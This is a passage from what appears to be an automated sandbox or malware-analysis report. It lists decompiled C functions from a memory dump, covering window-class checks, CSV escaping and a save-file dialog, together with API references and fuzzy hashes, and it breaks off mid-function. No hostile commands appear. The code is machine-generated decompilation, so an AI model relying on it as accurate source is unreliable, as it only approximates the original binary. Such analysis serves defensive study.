                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                    • String ID: caption
                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                    • Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                                    • Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
                                                                                                                                                                    • Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                    			E00405954(struct HWND__* _a4) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				short _v516;
                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                    
                                                                                                                                                                    				_v516 = _v516 & 0x00000000;
                                                                                                                                                                    				memset( &_v514, 0, 0x1fe);
                                                                                                                                                                    				GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                                    				_t11 =  &_v516;
                                                                                                                                                                    				_push(L"edit");
                                                                                                                                                                    				_push(_t11);
                                                                                                                                                                    				L0040E03E();
                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                    				return  ~_t11 + 1;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                    • String ID: edit
                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                    • Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                                    • Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
                                                                                                                                                                    • Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
                                                                                                                                                                    • Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040DA9D() {
                                                                                                                                                                    				struct HINSTANCE__* _t1;
                                                                                                                                                                    				_Unknown_base(*)()* _t2;
                                                                                                                                                                    
                                                                                                                                                                    				if( *0x413268 == 0) {
                                                                                                                                                                    					_t1 = LoadLibraryW(L"shell32.dll");
                                                                                                                                                                    					 *0x413268 = _t1;
                                                                                                                                                                    					if(_t1 != 0) {
                                                                                                                                                                    						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                                                                    						 *0x413264 = _t2;
                                                                                                                                                                    						return _t2;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t1;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                    • API String ID: 2574300362-880857682
                                                                                                                                                                    • Opcode ID: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                                    • Instruction ID: 122d2585c685c0691ad6c3d54d7046cb00117d102b384f1c3bcadfb2245e5d9f
                                                                                                                                                                    • Opcode Fuzzy Hash: afd27a41b0bfe2ea412867375fb9fe93228578f58e863494430a310e9e96df8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5ED0C9F0A59300AAD720AF65AE097923AA4AB40713F149576E804F12B0D7B881C8CE6C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                    			E00408885(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				wchar_t* _v36;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                    				wchar_t* _t41;
                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                    				wchar_t* _t53;
                                                                                                                                                                    				wchar_t* _t62;
                                                                                                                                                                    				wchar_t* _t63;
                                                                                                                                                                    				wchar_t* _t64;
                                                                                                                                                                    				void* _t68;
                                                                                                                                                                    				void* _t69;
                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                    				wchar_t* _t79;
                                                                                                                                                                    				wchar_t* _t83;
                                                                                                                                                                    
                                                                                                                                                                    				_t68 = __ebx;
                                                                                                                                                                    				_t79 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t39 =  *( *((intOrPtr*)(_t68 + 0x38)) + _v8 * 4);
                                                                                                                                                                    						_t71 = _a8;
                                                                                                                                                                    						if(_t71 != _t79) {
                                                                                                                                                                    							_t83 =  *((intOrPtr*)( *_t71))(_t39,  *((intOrPtr*)(_t68 + 0x68)));
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t83 =  *( *((intOrPtr*)(_t68 + 0x2e4)) + 0x10 + _t39 * 0x14);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t41 = wcschr(_t83, 0x2c);
                                                                                                                                                                    						_pop(_t69);
                                                                                                                                                                    						if(_t41 != 0) {
                                                                                                                                                                    							L10:
                                                                                                                                                                    							_v36 = _t79;
                                                                                                                                                                    							_v32 = _t79;
                                                                                                                                                                    							_v28 = _t79;
                                                                                                                                                                    							_v20 = 0x100;
                                                                                                                                                                    							_v24 = 1;
                                                                                                                                                                    							_v16 = 0x22;
                                                                                                                                                                    							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
                                                                                                                                                                    							while(1) {
                                                                                                                                                                    								_t45 =  *_t83 & 0x0000ffff;
                                                                                                                                                                    								__eflags = _t45;
                                                                                                                                                                    								_v12 = _t45;
                                                                                                                                                                    								_t81 =  &_v36;
                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                    									break;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t45 - 0x22;
                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                    									_push( &_v12);
                                                                                                                                                                    									_t48 = 1;
                                                                                                                                                                    									__eflags = 1;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_push(L"\"\"");
                                                                                                                                                                    									_t48 = _t45 | 0xffffffff;
                                                                                                                                                                    								}
                                                                                                                                                                    								E004063DD(_t48, _t69, _t81, __eflags);
                                                                                                                                                                    								_t83 =  &(_t83[0]);
                                                                                                                                                                    								__eflags = _t83;
                                                                                                                                                                    							}
                                                                                                                                                                    							E004063DD( &_v16 | 0xffffffff, _t69,  &_v36, __eflags,  &_v16);
                                                                                                                                                                    							_t53 = _v36;
                                                                                                                                                                    							__eflags = _t53;
                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                    								_t53 = 0x40f454;
                                                                                                                                                                    							}
                                                                                                                                                                    							E00408857(_t68, _t69, _a4, _t53);
                                                                                                                                                                    							E00406355( &_v36);
                                                                                                                                                                    							_t79 = 0;
                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t62 = wcschr(_t83, 0x22);
                                                                                                                                                                    							_pop(_t69);
                                                                                                                                                                    							if(_t62 != 0) {
                                                                                                                                                                    								goto L10;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t63 = wcschr(_t83, 0xd);
                                                                                                                                                                    								_pop(_t69);
                                                                                                                                                                    								if(_t63 != 0) {
                                                                                                                                                                    									goto L10;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t64 = wcschr(_t83, 0xa);
                                                                                                                                                                    									_pop(_t69);
                                                                                                                                                                    									if(_t64 != 0) {
                                                                                                                                                                    										goto L10;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										E00408857(_t68, _t69, _a4, _t83);
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_v8 <  *((intOrPtr*)(_t68 + 0x34)) - 1) {
                                                                                                                                                                    							E00408857(_t68, _t69, _a4, ",");
                                                                                                                                                                    						}
                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                    					} while (_v8 <  *((intOrPtr*)(_t68 + 0x34)));
                                                                                                                                                                    				}
                                                                                                                                                                    				return E00408857(_t68, _t69, _a4, L"\r\n");
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1983396471-0
                                                                                                                                                                    • Opcode ID: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                                    • Instruction ID: 891d09ae9378dccf635ba886e12c54397b7589aa880eb7d9b0c0a307a2786e7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 756c7a8378e56e10f3d760d0e98006f26f38834ae28c740255de16beb5e598db
                                                                                                                                                                    • Instruction Fuzzy Hash: 5B41B431900214ABDF10FEA5C941AAE7BB8EF04328F50853FF891F72C2DB7899458A59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E0040A084(void* __eax, void* __eflags, wchar_t* _a4, intOrPtr _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                    				void* _t76;
                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                    				wchar_t* _t91;
                                                                                                                                                                    				void* _t92;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				void* _t95;
                                                                                                                                                                    
                                                                                                                                                                    				_t76 = __eax;
                                                                                                                                                                    				E00407A66(__eax, __eflags);
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_t57 = 0;
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					_t91 = _a4;
                                                                                                                                                                    					if(( *(_t91 + _t57 * 2) & 0x0000ffff) + 0xffffffd0 > 9) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t57 = _t57 + 1;
                                                                                                                                                                    					if(_t57 < 1) {
                                                                                                                                                                    						continue;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t71 = wcslen(_t91);
                                                                                                                                                                    					if(_t71 >= 3) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(_t91);
                                                                                                                                                                    					L0040E062();
                                                                                                                                                                    					if(_t71 >= 0 && _t71 <  *((intOrPtr*)(_t76 + 0x34))) {
                                                                                                                                                                    						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t76 + 0x38)) + _t71 * 4) * 0x14 +  *((intOrPtr*)(_t76 + 0x2e4))));
                                                                                                                                                                    					}
                                                                                                                                                                    					L19:
                                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                                    						_v12 = _v12 | 0x00001000;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t80 =  *0x4131d4; // 0x1
                                                                                                                                                                    					_t58 = _v12;
                                                                                                                                                                    					 *0x4131d4 =  *0x4131d4 + 1;
                                                                                                                                                                    					 *((intOrPtr*)(0x4131d8 + _t80 * 4)) = _t58;
                                                                                                                                                                    					return _t58;
                                                                                                                                                                    				}
                                                                                                                                                                    				__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
                                                                                                                                                                    					L14:
                                                                                                                                                                    					_t92 = 0;
                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    					if( *((intOrPtr*)(_t76 + 0x2e0)) <= 0) {
                                                                                                                                                                    						goto L19;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						goto L15;
                                                                                                                                                                    					}
                                                                                                                                                                    					do {
                                                                                                                                                                    						L15:
                                                                                                                                                                    						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
                                                                                                                                                                    						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
                                                                                                                                                                    						_t95 = _t95 + 0x10;
                                                                                                                                                                    						__eflags = _t60;
                                                                                                                                                                    						if(_t60 >= 0) {
                                                                                                                                                                    							L17:
                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
                                                                                                                                                                    							goto L18;
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags = _t62;
                                                                                                                                                                    						if(_t62 < 0) {
                                                                                                                                                                    							goto L18;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L17;
                                                                                                                                                                    						L18:
                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                    						_t92 = _t92 + 0x14;
                                                                                                                                                                    						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                                    					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
                                                                                                                                                                    					goto L19;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t94 = 0;
                                                                                                                                                                    				__eflags = 0;
                                                                                                                                                                    				do {
                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                    					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
                                                                                                                                                                    					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
                                                                                                                                                                    					L0040E03E();
                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                    					_t67 =  *((intOrPtr*)(_t76 + 0x48));
                                                                                                                                                                    					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
                                                                                                                                                                    					L0040E03E();
                                                                                                                                                                    					_t95 = _t95 + 0x10;
                                                                                                                                                                    					__eflags = _t66;
                                                                                                                                                                    					if(_t66 == 0) {
                                                                                                                                                                    						L11:
                                                                                                                                                                    						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
                                                                                                                                                                    						_v16 = 1;
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    					__eflags = _t67;
                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    					L12:
                                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                                    					_t94 = _t94 + 0x14;
                                                                                                                                                                    					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
                                                                                                                                                                    				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
                                                                                                                                                                    				__eflags = _v16;
                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                    					goto L19;
                                                                                                                                                                    				}
                                                                                                                                                                    				goto L14;
                                                                                                                                                                    			}





















                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                                      • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A0B2
                                                                                                                                                                    • _wtoi.MSVCRT ref: 0040A0BE
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040A10C
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040A11D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				char _v16;
                                                                                                                                                                    				char* _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				char* _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				char* _v36;
                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                    				char* _v44;
                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                    				char* _v52;
                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                    				char* _v60;
                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                    				char* _v68;
                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                    				char* _v76;
                                                                                                                                                                    				char _v80;
                                                                                                                                                                    				void _v2126;
                                                                                                                                                                    				signed short _v2128;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				char _t32;
                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                    				char _t34;
                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                    				signed short _t57;
                                                                                                                                                                    				char* _t62;
                                                                                                                                                                    				char* _t64;
                                                                                                                                                                    
                                                                                                                                                                    				_v2128 = _v2128 & 0x00000000;
                                                                                                                                                                    				memset( &_v2126, 0, 0x7fe);
                                                                                                                                                                    				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
                                                                                                                                                                    				_v16 = _t32;
                                                                                                                                                                    				_t33 =  *0x410294; // 0x74
                                                                                                                                                                    				_v12 = _t33;
                                                                                                                                                                    				_t34 = E00406827(0x1f5);
                                                                                                                                                                    				_t64 = L"*.txt";
                                                                                                                                                                    				_v80 = _t34;
                                                                                                                                                                    				_v76 = _t64;
                                                                                                                                                                    				_v72 = E00406827(0x1f6);
                                                                                                                                                                    				_v68 = _t64;
                                                                                                                                                                    				_v64 = E00406827(0x1f7);
                                                                                                                                                                    				_v60 = L"*.json";
                                                                                                                                                                    				_v56 = E00406827(0x1fb);
                                                                                                                                                                    				_v52 = L"*.csv";
                                                                                                                                                                    				_t38 = E00406827(0x1f8);
                                                                                                                                                                    				_t62 = L"*.htm;*.html";
                                                                                                                                                                    				_v48 = _t38;
                                                                                                                                                                    				_v44 = _t62;
                                                                                                                                                                    				_v40 = E00406827(0x1f9);
                                                                                                                                                                    				_v36 = _t62;
                                                                                                                                                                    				_v32 = E00406827(0x1fa);
                                                                                                                                                                    				_v28 = L"*.xml";
                                                                                                                                                                    				_v24 = E00406827(0x1fc);
                                                                                                                                                                    				_v20 = _t64;
                                                                                                                                                                    				E00406050( &_v2128,  &_v80);
                                                                                                                                                                    				_t57 = 7;
                                                                                                                                                                    				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
                                                                                                                                                                    			}

































                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040AB90
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                                      • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                                      • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                                      • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                                      • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                                      • Part of subcall function 00406050: memset.MSVCRT ref: 00406071
                                                                                                                                                                      • Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
                                                                                                                                                                      • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
                                                                                                                                                                      • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
                                                                                                                                                                      • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
                                                                                                                                                                      • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4
                                                                                                                                                                      • Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
                                                                                                                                                                      • Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                    • String ID: *.htm;*.html$*.txt$txt
                                                                                                                                                                    • API String ID: 1392923015-1706329710
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                    				void* _t24;
                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                    				void* _t33;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                    				void* _t48;
                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                    				int _t52;
                                                                                                                                                                    				void** _t53;
                                                                                                                                                                    				void* _t58;
                                                                                                                                                                    
                                                                                                                                                                    				_t53 = __esi;
                                                                                                                                                                    				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                                    				_t51 =  *_t1;
                                                                                                                                                                    				_t21 = 0;
                                                                                                                                                                    				if(_t51 <= 0) {
                                                                                                                                                                    					L4:
                                                                                                                                                                    					_t2 =  &(_t53[2]); // 0x8
                                                                                                                                                                    					_t33 =  *_t53;
                                                                                                                                                                    					_t23 =  *_t2 + _t51;
                                                                                                                                                                    					_t46 = 8;
                                                                                                                                                                    					_t53[1] = _t23;
                                                                                                                                                                    					_t24 = _t23 * _t46;
                                                                                                                                                                    					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                                                                    					L0040E038();
                                                                                                                                                                    					_t10 =  &(_t53[1]); // 0x0
                                                                                                                                                                    					 *_t53 = _t24;
                                                                                                                                                                    					memset(_t24, 0,  *_t10 << 3);
                                                                                                                                                                    					_t52 = _t51 << 3;
                                                                                                                                                                    					memcpy( *_t53, _t33, _t52);
                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                    						_push(_t33);
                                                                                                                                                                    						L0040E032();
                                                                                                                                                                    					}
                                                                                                                                                                    					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                                                                    					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t44 =  *__esi;
                                                                                                                                                                    					_t48 = _t44;
                                                                                                                                                                    					while( *_t48 != 0) {
                                                                                                                                                                    						_t21 = _t21 + 1;
                                                                                                                                                                    						_t48 = _t48 + 8;
                                                                                                                                                                    						_t58 = _t21 - _t51;
                                                                                                                                                                    						if(_t58 < 0) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							goto L4;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L7;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t31 = _t21 << 3;
                                                                                                                                                                    					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                                                                    					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                                                                    				}
                                                                                                                                                                    				L7:
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                    • Opcode ID: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
                                                                                                                                                                    • Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
                                                                                                                                                                    • Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                    			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                                                                    				char _v16390;
                                                                                                                                                                    				short _v16392;
